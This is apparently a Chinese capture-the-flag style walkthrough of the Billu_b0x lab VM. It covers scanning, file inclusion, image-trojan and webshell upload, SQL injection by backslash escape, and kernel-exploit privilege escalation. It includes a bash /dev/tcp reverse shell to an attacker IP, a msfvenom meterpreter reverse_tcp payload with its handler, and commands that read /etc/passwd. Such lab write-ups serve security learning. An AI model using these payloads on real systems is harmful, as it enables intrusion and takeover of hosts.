Billu_b0x滲透總結

Billu_b0x這個靶機也是斷斷續續的才做完,途中遇到了很多不懂的,但是這也表明進步的空間很大,這個靶機很適合我們這種初級的學習者,其中不乏趣味性,也有點難度,但總體思路是清晰的,有興趣的同學不妨試試。

1.主機發現

arp-scan -l(不會掃描自己)
或者
nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要掃)
在這裏插入圖片描述
在這裏插入圖片描述

2.端口掃描

nmap -sS 192.168.223.132
或者
nmap -sS -A -Pn -p- -n 192.168.223.132
或者
nmap 192.168.223.0/24
或者
messcan 192.168.223.132 -p 0-65535 --rate=10000(這個命令可能會漏掃,建議多掃幾下)
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

3.掃描目錄

dirb http://192.168.223.132
或者
dirb http://192.168.223.132 /usr/share/dirb/wordlists/wordlists/big.txt
我們可以看到爆破出很多目錄,而有用的是以下目錄:
uploaded_images/
phpmy/
in.php
c.php
/test.php
在這裏插入圖片描述
查看bird爆出來的目錄,發現有個test.php,需要傳遞file參數,
在這裏插入圖片描述

方法一:

首先我們,看到22端口是開放的,那我我們只要得到主機的賬號密碼就可以成功了
PHP默認配置文件是config.inc.php,Linux系統路徑結合phpmy,
文件應在/var/www/phpmy/下:var/www/phpmy/config.inc.php 直接查看賬戶信息
在這裏插入圖片描述
然後ssh登錄
在這裏插入圖片描述

方法二

通過test傳參讀取實驗發現,c.php是數據庫的配置文件
$conn = mysqli_connect(“127.0.0.1”,“billu”,“b0x_billu”,“ica_lab”);
在這裏插入圖片描述
那麼我們進入phpmyadmin看看,而這裏的名字是phpmy,然後填寫賬號密碼進入
在這裏插入圖片描述
查看指定數據庫裏發現有賬號密碼,那麼可能是首頁的賬號密碼,我們登陸進去看康康
biLLu hEx_it
在這裏插入圖片描述
登陸之後,跳轉到一個叫panel.php的頁面,發現可以查看用戶信息,也可以添加用戶信息
在這裏插入圖片描述
很明顯這個是可以上傳木馬的,但是我們先看下我們先代碼審計一下,發現有白名單機制,只能上傳圖片格式,在這裏插入圖片描述
還有文件包含,
在這裏插入圖片描述
這時候我們就來上傳一個圖片馬,
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
得到木馬上傳位置
http://192.168.223.132/uploaded_images/a.jpg
在這裏插入圖片描述

文件包含getshell(連接菜刀)

上傳的圖片的路徑爲:
http://192.168.8.129/uploaded_images/a.jpg
用panel.php或者test.php文件,都可以包含這個圖片馬,但是是以POST訪問,而菜刀只能以GET訪問,所以菜刀是不能連接這個圖片馬的
file=uploaded_images/a.jpg
在這裏插入圖片描述

或者

在這裏插入圖片描述
而菜刀只能以GET訪問,所以菜刀是不能連接這個圖片馬的

在這裏插入圖片描述
在這裏插入圖片描述

換個思路

1、在之前圖片馬的基礎上,然後進行寫入一句話文件,菜刀連接一句話文件後提權。

2、使用burp執行命令:用POST請求執行cmd命令:POST /panel.php?cmd=cat /etc/passwd

(這裏的cat /etc/passwd必須轉換成url編碼纔行,不然看執行失敗)

POST的body中包含cmd.jpg圖片馬:load=/uploaded_images/a.jpg&continue=continue

成功執行命令cat /etc/passwd
在這裏插入圖片描述
在這裏插入圖片描述
上面個命令無所謂,只是爲了測試能否成功,
執行cmd命令 ls -la 康康那個目錄可寫!然後寫入(滑稽)
在這裏插入圖片描述
發現了uploaded_images目錄可寫,在BP或者hackbar中直接以POST方式寫一句話到/uploaded_images下的xiao.php
(注:都要把cmd命令換成url編碼)
在這裏插入圖片描述
在這裏插入圖片描述
用cat uploaded_images/xiao.php
可以看到已經成功寫入一句話木馬到xiao.php
(這裏其實應該只有一個,因爲我只寫了一個)
在這裏插入圖片描述
菜刀連接shell.php
路徑:http://192.168.223.132/uploaded_images/xiao.php 尼瑪:mm
在這裏插入圖片描述
在這裏插入圖片描述

提權

在菜刀的虛擬終端
在這裏插入圖片描述
cat /etc/issue和uname -a
查看系統的版本信息和內核爲:Ubuntu 12.04.5 LTS、Linux indishell 3.13.0-32-generic
在這裏插入圖片描述
在kali的searchsploit(漏洞數據庫)中搜索這個系統版本的漏洞
searchsploit Ubuntu 12.04
在這裏插入圖片描述
選擇相應的linux版本,將exp拷貝下來(這裏我是拷貝到root目錄下的)

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/

賦予執行權限 chmod 777 37292.c
在這裏插入圖片描述
在kali本機上gcc編譯後生成exp gcc 37292.c -o exp
(格式:gcc 文件.c -o 文件,如果不指定文件名,默認生成a.out)
在這裏插入圖片描述
將當前目錄下生成的exp用菜刀上傳至靶機上直接運行
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
將當前目錄下生成的exp用菜刀上傳至靶機上直接運行,屢次提權失敗,

在這裏插入圖片描述
不知道原因,既然菜刀都連上了,不妨用kaili生成後門,正好學習一下
看到當前目錄通篇都是php環境,很自然想到用msfvenom生成一個php後門,菜刀上傳,觸發它反彈再提權

生成後門

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=192.168.223.134 -f raw >/root/xiaoyuan.php

在這裏插入圖片描述
菜刀上傳
在這裏插入圖片描述
開啓msf配置好handler:

use exploit/multi/handler
set lhost 192.168.8.253
set payload php/meterpreter/reverse_tcp
run

在這裏插入圖片描述
觸發後門
http://192.168.223.132/uploaded_images/xiaoyuan.php
在這裏插入圖片描述
反彈拿到shell,直接運行之前編譯好的exp提取、提權成功
在這裏插入圖片描述

方法三

這裏跟方法二差不多的,前面都差不多一樣,這是拿shell、提權這裏不同
所以這裏的重複步驟我就文字敘述了
1.端口掃描&目錄爆破
2. 2,利用文件包含漏洞
(這2步在方法二中都是有的)

3,shell反彈,root提權 kali命令行裏輸入nc -lvnp 6666開始監聽,同時burp的post請求中執行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1″ | bash,注意要將此命令先經過URL編碼才能發送
在這裏插入圖片描述
在這裏插入圖片描述
shell反彈成功,我們還有個root用戶一直沒有派上用場,直接su -
在這裏插入圖片描述
又是提示需要終端,輸入命令 python -c ‘import pty;pty.spawn(“/bin/bash”)’
再重試一下

OK,進入到root目錄,成功。

方法四

前面的步驟跟方法二基本一樣。
這裏是直接首頁代碼審計,然後sql注入
通過test.php這個特殊的傳參讀取,我們來看首頁的源碼(代碼審計)
在這裏插入圖片描述
雖然前面使用str_replace( )函數將單引號全部過濾了,但是我們可以在輸入pass時,輸入一個 \ 符號,將uname逃逸出來。
例如我們輸入123/123,這裏的查詢語句就是:
select * from auth where pass=‘123’ and uname=‘123’

輸入pass=123\ uname= or 1=1 --+
其中or 1=1永真,就可以成功繞過。
查詢語句就成了:
select * from auth where pass=‘123’ and uname=’ or 1=1 – ’
在這裏插入圖片描述
這裏學習了兩個函數,順便記錄一下:
(1)file_get_contents(),用於將文件的內容讀入到一個字符串中:
成功讀取到c.php內容:
在這裏插入圖片描述
(2)scandir( ) 函數返回指定目錄中的文件和目錄的數組。
在這裏插入圖片描述
之前我們在方法二中已經知道了哪個目錄可寫,那麼我們現在來就寫一個一句話木馬
嘗試對寫入內容使用ascii碼的方式傳入。
編寫以下代碼將一句話木馬轉換爲ascii碼的方式:
後面步驟和上面基本一樣,
後面步驟和上面基本一樣,
只是一句話木馬不一樣
在這裏插入圖片描述
轉Ascii碼

在這裏插入圖片描述
嘗試訪問config.php,未報錯,生成成功:
在這裏插入圖片描述
然後菜刀連接
系統提權:
whoami
id
uname -a
cat /etc/issue

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章